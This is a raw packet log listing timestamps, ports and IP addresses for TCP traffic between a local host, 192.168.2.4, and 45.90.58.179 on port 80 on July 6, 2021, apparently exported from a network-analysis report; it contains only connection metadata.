Jul 6, 2021 14:31:07.825229883 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825253963 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825263977 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825278997 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825295925 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825304031 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825330019 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825330973 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825359106 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825360060 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825382948 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825383902 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825411081 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825416088 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825434923 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825459957 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825462103 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825505018 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825525999 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825553894 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825579882 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825594902 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825601101 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825619936 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825625896 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825651884 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825653076 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825680971 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825702906 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:09.401417017 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:09.401909113 CEST	49881	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:09.785032034 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:09.785332918 CEST	49883	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.316709995 CEST	49884	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.324213028 CEST	49887	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.324415922 CEST	49885	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.324595928 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.353219986 CEST	80	49884	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.354466915 CEST	49884	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.355328083 CEST	49884	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.361454010 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.361561060 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.362144947 CEST	80	49887	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.362175941 CEST	80	49885	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.362250090 CEST	49887	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.362313032 CEST	49885	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.376338005 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.392249107 CEST	80	49884	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.413357019 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.415927887 CEST	80	49884	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.415961027 CEST	80	49884	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.415982962 CEST	80	49884	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.416011095 CEST	49884	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.416054964 CEST	49884	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.434812069 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.434838057 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.434854031 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.434911966 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.434959888 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.434976101 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.434993029 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.435004950 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.435020924 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.435034990 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.435050964 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.435113907 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.435132027 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.435190916 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.435208082 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.435256958 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.435287952 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.472871065 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.472929955 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.472970963 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473011017 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473009109 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473047972 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473095894 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473103046 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473140001 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473153114 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473160028 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473165035 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473169088 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473196983 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473237038 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473277092 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473278999 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473313093 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473329067 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473351002 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473376036 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473388910 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473429918 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473438978 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473452091 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473481894 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473519087 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473520041 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473555088 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473557949 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473596096 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473634005 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473674059 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.473716974 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473728895 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473735094 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473746061 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.473751068 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510636091 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510677099 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510704994 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510730028 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510759115 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510787010 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510798931 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510812044 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510833979 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510838032 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510839939 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510859013 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510864973 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510885954 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510890961 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510910988 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510917902 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510931015 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510943890 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510972977 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.510986090 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510997057 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.510998964 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511024952 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511037111 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511051893 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511053085 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511077881 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511086941 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511104107 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511109114 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511133909 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511151075 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511178017 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511198044 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511203051 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511213064 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511230946 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511234999 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511256933 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511257887 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511282921 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511293888 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511302948 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511308908 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511336088 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511342049 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511357069 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511360884 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511387110 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511392117 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511406898 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511414051 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511441946 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511445045 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511457920 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511468887 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511493921 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511495113 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511512995 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511519909 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511545897 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511552095 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511565924 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511571884 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511594057 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511596918 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511624098 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511632919 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511643887 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511652946 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511682034 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511684895 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511697054 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511708975 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.511742115 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.511781931 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.548918009 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.548971891 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549015045 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549051046 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549088001 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549088955 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549122095 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549123049 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549141884 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549144983 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549155951 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549181938 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549187899 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549213886 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549222946 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549254894 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549274921 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549280882 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549304962 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549314976 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549338102 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549346924 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549369097 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549380064 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549410105 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549416065 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549437046 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549457073 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549458981 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549493074 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549513102 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549525976 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549529076 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549560070 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549592972 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549595118 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549626112 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549643040 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549659014 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549660921 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549690962 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549707890 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549731016 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549734116 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549767017 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549818039 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549835920 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549850941 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549855947 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549882889 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549884081 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549915075 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549935102 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549947977 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.549968004 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.549979925 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550004959 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550020933 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550024986 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550056934 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550076008 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550090075 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550095081 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550122976 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550147057 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550158024 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550178051 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550189018 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550213099 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550221920 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550246000 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550254107 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550257921 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550293922 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550297022 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550329924 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550333977 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550362110 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550384045 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550405025 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550405025 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550437927 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550462961 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550470114 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550494909 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550503016 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550529003 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550534964 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550553083 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550566912 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550584078 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550600052 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550632000 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550633907 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550664902 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550673008 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550698042 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550710917 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550729036 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550744057 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550744057 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550777912 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550796032 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550811052 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550837040 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550843000 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550864935 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550874949 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550898075 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550906897 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550930023 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.550956011 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550975084 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.550981998 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551007986 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551009893 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551043034 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551043987 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551073074 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551075935 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551100969 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551120996 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551140070 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551186085 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551213026 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551220894 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551253080 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551254034 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551286936 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551312923 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551320076 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551343918 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551351070 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551373959 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551383972 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551409960 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551417112 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551439047 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551455975 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551459074 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551492929 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551512003 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551526070 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551552057 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551558018 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.551582098 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551590919 CEST	80	49886	45.90.58.179	192.168.2.4
